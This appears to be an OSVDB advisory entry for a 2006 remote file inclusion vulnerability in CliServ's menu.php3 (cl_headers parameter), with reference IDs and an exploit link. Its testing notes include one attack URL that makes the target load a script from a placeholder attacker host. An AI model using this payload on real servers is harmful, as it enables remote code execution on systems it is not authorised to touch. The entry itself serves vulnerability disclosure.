Web Community menu.php3 cl_headers Variable Remote File Inclusion

2006-08-25T00:00:00
ID OSVDB:36949
Type osvdb
Reporter OSVDB
Modified 2006-08-25T00:00:00

Description

Manual Testing Notes

http://[target]/[CliServ_path]/menu.php3?cl_headers=[http://[attacker]/evil_scripts.txt]

References:

Related OSVDB ID: 36950 ISS X-Force ID: 28590 Generic Exploit URL: http://www.milw0rm.com/exploits/2257 CVE-2006-7068 Bugtraq ID: 19737